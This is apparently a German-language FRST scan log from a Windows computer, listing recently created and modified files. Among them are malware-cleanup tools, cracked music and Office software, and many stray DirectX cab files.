2015-09-20 19:13 - 2015-09-20 19:13 - 00050477 _____ C:\Users\Kenny G\Downloads\Defogger.exe
2015-09-20 19:07 - 2015-09-20 19:07 - 00000000 ____D C:\Users\Kenny G\Desktop\Festplatte
2015-09-20 19:00 - 2015-09-20 19:00 - 03237248 _____ (Enigma Software Group USA, LLC.) C:\Users\Kenny G\Downloads\SpyHunter-Installer.exe
2015-09-20 18:19 - 2015-09-20 18:19 - 00004680 _____ C:\Users\Kenny G\Desktop\JRT.txt
2015-09-20 18:00 - 2015-09-20 18:00 - 01798976 _____ (Malwarebytes) C:\Users\Kenny G\Downloads\JRT.exe
2015-09-20 17:43 - 2015-09-23 04:58 - 00113880 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\MBAMSwissArmy.sys
2015-09-20 17:42 - 2015-09-20 17:42 - 00001157 _____ C:\Users\Public\Desktop\ Malwarebytes Anti-Malware .lnk
2015-09-20 17:42 - 2015-09-20 17:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ Malwarebytes Anti-Malware 
2015-09-20 17:42 - 2015-09-20 17:42 - 00000000 ____D C:\Program Files (x86)\ Malwarebytes Anti-Malware 
2015-09-20 17:42 - 2015-06-18 08:41 - 00109272 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbamchameleon.sys
2015-09-20 17:42 - 2015-06-18 08:41 - 00063704 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mwac.sys
2015-09-20 17:42 - 2015-06-18 08:41 - 00025816 _____ (Malwarebytes Corporation) C:\Windows\system32\Drivers\mbam.sys
2015-09-20 17:36 - 2015-09-20 17:38 - 24345872 _____ (Malwarebytes Corporation ) C:\Users\Kenny G\Downloads\mbam-setup-2.1.8.1057.exe
2015-09-20 17:36 - 2015-09-20 17:37 - 01662976 _____ C:\Users\Kenny G\Downloads\AdwCleaner_5.008.exe
2015-09-19 17:25 - 2015-09-21 18:10 - 00000000 ____D C:\Program Files (x86)\Trojan Remover
2015-09-19 17:14 - 2015-09-19 17:15 - 01457952 _____ C:\Users\Kenny G\Downloads\Trojan Remover - CHIP-Installer.exe
2015-09-19 17:11 - 2015-09-20 17:29 - 00000584 _____ C:\task.vbs
2015-09-19 16:17 - 2015-09-19 16:48 - 00000000 ____D C:\Windows\system32\MRT
2015-09-19 16:16 - 2015-09-19 16:16 - 00000000 ____D C:\Windows\system32\EventProviders
2015-09-19 16:02 - 2015-07-29 09:23 - 00000000 ____D C:\Users\Kenny G\Desktop\Steuerungs- und Regeltechnik
2015-09-19 15:37 - 2015-09-19 15:37 - 00001494 _____ C:\Users\Kenny G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2015-09-19 12:25 - 2015-09-19 12:25 - 00000000 ___RD C:\MSOCache
2015-09-19 12:24 - 2015-09-19 12:24 - 00000000 ____D C:\Users\Kenny G\AppData\Local\Disc_Soft_Ltd
2015-09-19 12:21 - 2015-09-21 19:35 - 00000000 ____D C:\Users\Kenny G\AppData\Roaming\DAEMON Tools Lite
2015-09-19 12:21 - 2015-09-19 12:23 - 00000000 ____D C:\Program Files\DAEMON Tools Lite
2015-09-19 12:21 - 2015-09-19 12:21 - 00030264 _____ (Disc Soft Ltd) C:\Windows\system32\Drivers\dtlitescsibus.sys
2015-09-19 12:21 - 2015-09-19 12:21 - 00000000 ____D C:\ProgramData\DAEMON Tools Lite
2015-09-19 12:15 - 2015-09-19 12:15 - 00000000 ____D C:\Users\Kenny G\AppData\Local\Could not connect. Error code = 0x-1442664913---
2015-09-19 12:14 - 2009-06-10 23:00 - 00000824 _____ C:\Windows\system32\Drivers\etc\hp.bak
2015-09-19 12:12 - 2015-09-20 01:26 - 00000000 ____D C:\Program Files (x86)\Could not connect. Error code = 0x-1442657579---
2015-09-19 12:06 - 2015-09-19 12:12 - 00000000 ____D C:\ProgramData\Microsoft Toolkit
2015-09-19 11:42 - 2015-09-19 15:43 - 00000000 ____D C:\Users\Kenny G\Desktop\Neuer Ordner (3)
2015-09-19 11:35 - 2015-09-19 11:38 - 55791130 _____ C:\Users\Kenny G\Downloads\MS-PowerPoint-2013-ISO-and-Activator.zip
2015-09-19 11:07 - 2015-09-19 11:07 - 00000000 ____D C:\Windows\System32\Tasks\OfficeSoftwareProtectionPlatform
2015-09-19 11:06 - 2015-09-19 16:06 - 00000000 ____D C:\ProgramData\Microsoft Help
2015-09-19 11:06 - 2015-09-19 11:06 - 00000000 ____D C:\Users\Kenny G\AppData\Local\Microsoft Help
2015-09-13 21:57 - 2015-09-13 22:26 - 00000000 ____D C:\Users\Kenny G\Desktop\USB Lieder
2015-09-13 12:25 - 2015-09-13 12:30 - 327964808 _____ (Microsoft Corporation) C:\Users\Kenny G\Downloads\X16-32694.exe
2015-09-01 22:40 - 2015-09-01 22:40 - 00001666 _____ C:\Users\Kenny G\Desktop\Traktor.exe - Verknüpfung.lnk
2015-09-01 21:50 - 2015-09-01 21:58 - 241712938 _____ C:\Users\Kenny G\Downloads\Traktor_2_290_PC.zip
2015-09-01 21:43 - 2015-09-01 21:43 - 01260832 _____ C:\Users\Kenny G\Downloads\Traktor Pro 2 - CHIP-Installer.exe
2015-09-01 20:31 - 2015-09-01 20:31 - 00000000 ____D C:\Backup
2015-09-01 20:20 - 2015-08-07 22:21 - 00000000 ____D C:\Users\Kenny G\Desktop\Native.Instruments.TRAKTOR.2.v2.9.0.x86.x64-CHAOS
2015-08-31 23:34 - 2015-09-01 20:19 - 527315694 _____ C:\Users\Kenny G\Downloads\2.9.0.x86.x64-CHAOS.rar
2015-08-29 20:33 - 2015-08-29 20:34 - 00000000 ____D C:\ProgramData\Package Cache
2015-08-29 19:48 - 2015-09-21 19:34 - 00000000 ____D C:\Users\Kenny G\Desktop\Alles
2015-08-29 16:06 - 2015-08-30 01:38 - 00000000 ____D C:\Program Files (x86)\Mozilla Firefox

==================== Ein Monat: Geänderte Dateien und Ordner ========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)

2015-09-23 04:54 - 2015-05-19 19:27 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d0925912504720.job
2015-09-23 04:52 - 2009-07-14 06:45 - 00014016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2015-09-23 04:52 - 2009-07-14 06:45 - 00014016 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2015-09-23 04:47 - 2013-10-01 21:23 - 01158110 _____ C:\Windows\WindowsUpdate.log
2015-09-23 04:44 - 2015-06-01 12:52 - 00000000 ____D C:\ProgramData\MFAData
2015-09-23 04:40 - 2015-05-19 19:27 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70.job
2015-09-21 18:38 - 2009-07-14 05:20 - 00000000 __RHD C:\Users\Default
2015-09-21 18:37 - 2009-07-14 19:58 - 00696832 _____ C:\Windows\system32\perfh007.dat
2015-09-21 18:37 - 2009-07-14 19:58 - 00148128 _____ C:\Windows\system32\perfc007.dat
2015-09-21 18:37 - 2009-07-14 07:13 - 01613340 _____ C:\Windows\system32\PerfStringBackup.INI
2015-09-21 18:32 - 2009-07-14 04:34 - 00000215 _____ C:\Windows\system.ini
2015-09-21 18:31 - 2013-11-03 19:09 - 00000000 ____D C:\ProgramData\NVIDIA
2015-09-21 18:31 - 2009-07-14 07:08 - 00000006 ____H C:\Windows\Tasks\SA.DAT
2015-09-20 19:14 - 2013-10-01 21:24 - 00000000 ____D C:\Users\Kenny G
2015-09-20 18:21 - 2015-06-01 11:16 - 00000000 ____D C:\AdwCleaner
2015-09-20 18:07 - 2015-08-07 11:34 - 00000000 ____D C:\Users\Kenny G\AppData\Roaming\Lavasoft
2015-09-20 18:07 - 2015-08-07 11:33 - 00000000 ____D C:\ProgramData\Lavasoft
2015-09-20 18:07 - 2015-08-07 11:33 - 00000000 ____D C:\Program Files (x86)\Lavasoft
2015-09-20 03:16 - 2013-10-02 12:15 - 00000000 ____D C:\Users\Kenny G\AppData\Roaming\vlc
2015-09-19 18:33 - 2013-10-03 21:25 - 00000000 ____D C:\Users\Kenny G\AppData\Roaming\Skype
2015-09-19 16:38 - 2015-05-12 22:45 - 00000000 ____D C:\Program Files\Microsoft Silverlight
2015-09-19 16:38 - 2015-05-12 22:45 - 00000000 ____D C:\Program Files (x86)\Microsoft Silverlight
2015-09-19 16:35 - 2015-05-12 22:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2015-09-19 16:07 - 2015-08-07 11:38 - 00003848 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1438940281
2015-09-19 16:07 - 2015-08-07 11:37 - 00000000 ____D C:\Program Files (x86)\Opera
2015-09-19 16:06 - 2009-07-14 05:20 - 00000000 ____D C:\Program Files\Common Files\Microsoft Shared
2015-09-19 15:37 - 2015-06-02 08:55 - 00000000 ____D C:\ProgramData\AVG2015
2015-09-19 15:37 - 2013-10-01 21:25 - 00001442 _____ C:\Users\Kenny G\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer (64-bit).lnk
2015-09-19 11:54 - 2014-11-11 21:45 - 00000000 ____D C:\Users\Kenny G\Desktop\schule
2015-09-19 11:17 - 2009-07-14 20:18 - 00000000 ____D C:\Windows\ShellNew
2015-09-16 20:19 - 2015-05-19 19:27 - 00004106 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA1d0925912f22c70
2015-09-16 20:19 - 2015-05-19 19:27 - 00003854 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore1d0925912504720
2015-09-12 12:16 - 2014-01-15 20:58 - 00282296 _____ C:\Windows\SysWOW64\PnkBstrB.xtr
2015-09-12 12:16 - 2014-01-15 20:58 - 00282296 _____ C:\Windows\SysWOW64\PnkBstrB.exe
2015-09-12 12:14 - 2014-01-15 20:58 - 00215128 _____ C:\Windows\SysWOW64\PnkBstrB.ex0
2015-09-12 12:14 - 2013-12-08 04:01 - 00000000 ____D C:\Program Files (x86)\Steam
2015-09-09 10:54 - 2014-02-17 11:46 - 00000000 ____D C:\Users\Tabea Studium
2015-09-09 10:54 - 2013-12-14 00:05 - 00000000 ____D C:\Users\eLoot
2015-09-03 13:45 - 2013-10-26 19:41 - 00305664 ___SH C:\Users\Kenny G\Documents\Thumbs.db
2015-09-03 13:43 - 2015-08-13 02:23 - 00000946 _____ C:\Windows\Tasks\Adobe Flash Player PPAPI Notifier.job
2015-09-03 13:43 - 2015-02-10 17:45 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80.job
2015-09-03 13:43 - 2015-02-10 17:45 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0.job
2015-09-03 13:43 - 2014-11-14 16:21 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90.job
2015-09-03 13:43 - 2014-02-16 13:52 - 00001110 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineUA.job
2015-09-03 13:43 - 2014-02-16 13:52 - 00001106 _____ C:\Windows\Tasks\GoogleUpdateTaskMachineCore.job
2015-09-02 22:17 - 2015-06-01 12:10 - 00003206 _____ C:\Windows\System32\Tasks\{AFE2C666-2C4F-49BB-B86B-2CC7B241F441}
2015-09-02 22:17 - 2015-02-10 17:45 - 00004118 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA1d0454889312e80
2015-09-02 22:16 - 2015-08-13 02:23 - 00003948 _____ C:\Windows\System32\Tasks\Adobe Flash Player PPAPI Notifier
2015-09-02 22:16 - 2015-02-10 17:45 - 00003866 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore1d04548885af2c0
2015-09-02 22:16 - 2014-11-14 16:21 - 00004118 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA1d00016545d4e90
2015-09-02 22:16 - 2014-02-16 13:52 - 00004118 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA
2015-09-02 22:16 - 2014-02-16 13:52 - 00003866 _____ C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore
2015-09-02 22:16 - 2014-02-16 03:10 - 00003300 _____ C:\Windows\System32\Tasks\{7AD56248-245F-4D20-B2FB-3A38DD4D9679}
2015-09-02 22:16 - 2013-10-01 22:01 - 00002778 _____ C:\Windows\System32\Tasks\CCleanerSkipUAC
2015-09-01 22:34 - 2015-08-14 11:07 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Native Instruments
2015-09-01 22:33 - 2015-08-14 11:07 - 00000000 ____D C:\Program Files\Native Instruments
2015-09-01 22:24 - 2015-08-14 11:07 - 00000000 ____D C:\Program Files\Common Files\Native Instruments
2015-09-01 22:17 - 2015-08-08 00:13 - 00000000 ____D C:\Users\Kenny G\Documents\Native Instruments
2015-08-30 01:38 - 2013-12-04 21:27 - 00000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2015-08-29 20:01 - 2014-06-19 18:04 - 00000000 ____D C:\Users\Kenny G\.thumbnails
2015-08-29 20:01 - 2009-10-14 08:04 - 00000000 ____D C:\Windows\Panther
2015-08-29 15:58 - 2015-08-14 11:07 - 00000000 ____D C:\ProgramData\Native Instruments
2015-08-29 09:26 - 2015-06-02 08:56 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\AVG
2015-08-29 03:35 - 2009-07-14 05:20 - 00000000 ____D C:\Windows\system32\NDF
2015-08-26 18:37 - 2009-10-14 07:12 - 134753440 _____ (Microsoft Corporation) C:\Windows\system32\MRT.exe
2015-08-26 11:33 - 2015-06-02 09:01 - 00000000 ____D C:\Program Files (x86)\AVG Web TuneUp

==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======

2010-06-02 06:21 - 2010-06-02 06:21 - 1347354 _____ () C:\Program Files (x86)\Apr2005_d3dx9_25_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1078962 _____ () C:\Program Files (x86)\Apr2005_d3dx9_25_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1397830 _____ () C:\Program Files (x86)\Apr2006_d3dx9_30_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1115221 _____ () C:\Program Files (x86)\Apr2006_d3dx9_30_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0916430 _____ () C:\Program Files (x86)\Apr2006_MDX1_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 4162630 _____ () C:\Program Files (x86)\Apr2006_MDX1_x86_Archive.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0179133 _____ () C:\Program Files (x86)\Apr2006_XACT_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0133103 _____ () C:\Program Files (x86)\Apr2006_XACT_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0087101 _____ () C:\Program Files (x86)\Apr2006_xinput_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0046010 _____ () C:\Program Files (x86)\Apr2006_xinput_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0698612 _____ () C:\Program Files (x86)\APR2007_d3dx10_33_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0695865 _____ () C:\Program Files (x86)\APR2007_d3dx10_33_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1607358 _____ () C:\Program Files (x86)\APR2007_d3dx9_33_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1606039 _____ () C:\Program Files (x86)\APR2007_d3dx9_33_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0195766 _____ () C:\Program Files (x86)\APR2007_XACT_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0151225 _____ () C:\Program Files (x86)\APR2007_XACT_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0096817 _____ () C:\Program Files (x86)\APR2007_xinput_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0053302 _____ () C:\Program Files (x86)\APR2007_xinput_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1350542 _____ () C:\Program Files (x86)\Aug2005_d3dx9_27_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1077644 _____ () C:\Program Files (x86)\Aug2005_d3dx9_27_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0182903 _____ () C:\Program Files (x86)\AUG2006_XACT_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0137235 _____ () C:\Program Files (x86)\AUG2006_XACT_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0087142 _____ () C:\Program Files (x86)\AUG2006_xinput_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0046058 _____ () C:\Program Files (x86)\AUG2006_xinput_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0852286 _____ () C:\Program Files (x86)\AUG2007_d3dx10_35_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0796867 _____ () C:\Program Files (x86)\AUG2007_d3dx10_35_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1800160 _____ () C:\Program Files (x86)\AUG2007_d3dx9_35_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1708152 _____ () C:\Program Files (x86)\AUG2007_d3dx9_35_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0198096 _____ () C:\Program Files (x86)\AUG2007_XACT_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0153012 _____ () C:\Program Files (x86)\AUG2007_XACT_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0867612 _____ () C:\Program Files (x86)\Aug2008_d3dx10_39_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0849167 _____ () C:\Program Files (x86)\Aug2008_d3dx10_39_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1794084 _____ () C:\Program Files (x86)\Aug2008_d3dx9_39_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 1464672 _____ () C:\Program Files (x86)\Aug2008_d3dx9_39_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0121772 _____ () C:\Program Files (x86)\Aug2008_XACT_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0092996 _____ () C:\Program Files (x86)\Aug2008_XACT_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0271412 _____ () C:\Program Files (x86)\Aug2008_XAudio_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0271038 _____ () C:\Program Files (x86)\Aug2008_XAudio_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0919044 _____ () C:\Program Files (x86)\Aug2009_D3DCompiler_42_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0900598 _____ () C:\Program Files (x86)\Aug2009_D3DCompiler_42_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 3112111 _____ () C:\Program Files (x86)\Aug2009_d3dcsx_42_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 3319740 _____ () C:\Program Files (x86)\Aug2009_d3dcsx_42_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0232635 _____ () C:\Program Files (x86)\Aug2009_d3dx10_42_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0192131 _____ () C:\Program Files (x86)\Aug2009_d3dx10_42_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0136301 _____ () C:\Program Files (x86)\Aug2009_d3dx11_42_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0105044 _____ () C:\Program Files (x86)\Aug2009_d3dx11_42_x86.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0930116 _____ () C:\Program Files (x86)\Aug2009_d3dx9_42_x64.cab
2010-06-02 06:21 - 2010-06-02 06:21 - 0728456 _____ () C:\Program Files (x86)\Aug2009_d3dx9_42_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0122408 _____ () C:\Program Files (x86)\Aug2009_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0093106 _____ () C:\Program Files (x86)\Aug2009_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0273264 _____ () C:\Program Files (x86)\Aug2009_XAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0272642 _____ () C:\Program Files (x86)\Aug2009_XAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1357976 _____ () C:\Program Files (x86)\Dec2005_d3dx9_28_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1079456 _____ () C:\Program Files (x86)\Dec2005_d3dx9_28_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0212807 _____ () C:\Program Files (x86)\DEC2006_d3dx10_00_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0191720 _____ () C:\Program Files (x86)\DEC2006_d3dx10_00_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1571154 _____ () C:\Program Files (x86)\DEC2006_d3dx9_32_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1574376 _____ () C:\Program Files (x86)\DEC2006_d3dx9_32_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0192475 _____ () C:\Program Files (x86)\DEC2006_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0145599 _____ () C:\Program Files (x86)\DEC2006_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0089944 _____ (Microsoft Corporation) C:\Program Files (x86)\DSETUP.dll
2010-06-02 06:22 - 2010-06-02 06:22 - 1801048 _____ () C:\Program Files (x86)\dsetup32.dll
2010-06-02 06:22 - 2010-06-02 06:22 - 0042410 _____ () C:\Program Files (x86)\dxdllreg_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0537432 _____ () C:\Program Files (x86)\DXSETUP.exe
2010-06-02 06:22 - 2010-06-02 06:22 - 0094011 _____ () C:\Program Files (x86)\dxupdate.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1247499 _____ () C:\Program Files (x86)\Feb2005_d3dx9_24_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1013225 _____ () C:\Program Files (x86)\Feb2005_d3dx9_24_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1362796 _____ () C:\Program Files (x86)\Feb2006_d3dx9_29_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1084720 _____ () C:\Program Files (x86)\Feb2006_d3dx9_29_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0178359 _____ () C:\Program Files (x86)\Feb2006_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0132409 _____ () C:\Program Files (x86)\Feb2006_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0194675 _____ () C:\Program Files (x86)\FEB2007_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0147983 _____ () C:\Program Files (x86)\FEB2007_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0054678 _____ () C:\Program Files (x86)\Feb2010_X3DAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0020713 _____ () C:\Program Files (x86)\Feb2010_X3DAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0122446 _____ () C:\Program Files (x86)\Feb2010_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0093180 _____ () C:\Program Files (x86)\Feb2010_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0276960 _____ () C:\Program Files (x86)\Feb2010_XAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0277191 _____ () C:\Program Files (x86)\Feb2010_XAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1336002 _____ () C:\Program Files (x86)\Jun2005_d3dx9_26_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1064925 _____ () C:\Program Files (x86)\Jun2005_d3dx9_26_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0180785 _____ () C:\Program Files (x86)\JUN2006_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0133671 _____ () C:\Program Files (x86)\JUN2006_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0699044 _____ () C:\Program Files (x86)\JUN2007_d3dx10_34_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0698472 _____ () C:\Program Files (x86)\JUN2007_d3dx10_34_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1607774 _____ () C:\Program Files (x86)\JUN2007_d3dx9_34_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1607286 _____ () C:\Program Files (x86)\JUN2007_d3dx9_34_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0197122 _____ () C:\Program Files (x86)\JUN2007_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0152909 _____ () C:\Program Files (x86)\JUN2007_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0867828 _____ () C:\Program Files (x86)\JUN2008_d3dx10_38_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0849919 _____ () C:\Program Files (x86)\JUN2008_d3dx10_38_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1792608 _____ () C:\Program Files (x86)\JUN2008_d3dx9_38_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1463878 _____ () C:\Program Files (x86)\JUN2008_d3dx9_38_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0055154 _____ () C:\Program Files (x86)\JUN2008_X3DAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0021905 _____ () C:\Program Files (x86)\JUN2008_X3DAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0121054 _____ () C:\Program Files (x86)\JUN2008_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0093128 _____ () C:\Program Files (x86)\JUN2008_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0269628 _____ () C:\Program Files (x86)\JUN2008_XAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0269024 _____ () C:\Program Files (x86)\JUN2008_XAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0944460 _____ () C:\Program Files (x86)\Jun2010_D3DCompiler_43_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0931471 _____ () C:\Program Files (x86)\Jun2010_D3DCompiler_43_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0752783 _____ () C:\Program Files (x86)\Jun2010_d3dcsx_43_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0762188 _____ () C:\Program Files (x86)\Jun2010_d3dcsx_43_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0235955 _____ () C:\Program Files (x86)\Jun2010_d3dx10_43_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0197283 _____ () C:\Program Files (x86)\Jun2010_d3dx10_43_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0138205 _____ () C:\Program Files (x86)\Jun2010_d3dx11_43_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0109445 _____ () C:\Program Files (x86)\Jun2010_d3dx11_43_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0937246 _____ () C:\Program Files (x86)\Jun2010_d3dx9_43_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0768036 _____ () C:\Program Files (x86)\Jun2010_d3dx9_43_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0124596 _____ () C:\Program Files (x86)\Jun2010_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0093686 _____ () C:\Program Files (x86)\Jun2010_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0277338 _____ () C:\Program Files (x86)\Jun2010_XAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0278060 _____ () C:\Program Files (x86)\Jun2010_XAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0844884 _____ () C:\Program Files (x86)\Mar2008_d3dx10_37_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0818260 _____ () C:\Program Files (x86)\Mar2008_d3dx10_37_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1769862 _____ () C:\Program Files (x86)\Mar2008_d3dx9_37_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1443282 _____ () C:\Program Files (x86)\Mar2008_d3dx9_37_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0055058 _____ () C:\Program Files (x86)\Mar2008_X3DAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0021867 _____ () C:\Program Files (x86)\Mar2008_X3DAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0122336 _____ () C:\Program Files (x86)\Mar2008_XACT_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0093734 _____ () C:\Program Files (x86)\Mar2008_XACT_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0251194 _____ () C:\Program Files (x86)\Mar2008_XAudio_x64.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 0226250 _____ () C:\Program Files (x86)\Mar2008_XAudio_x86.cab
2010-06-02 06:22 - 2010-06-02 06:22 - 1067160 _____ () C:\Program Files (x86)\Mar2009_d3dx10_41_x64.cab
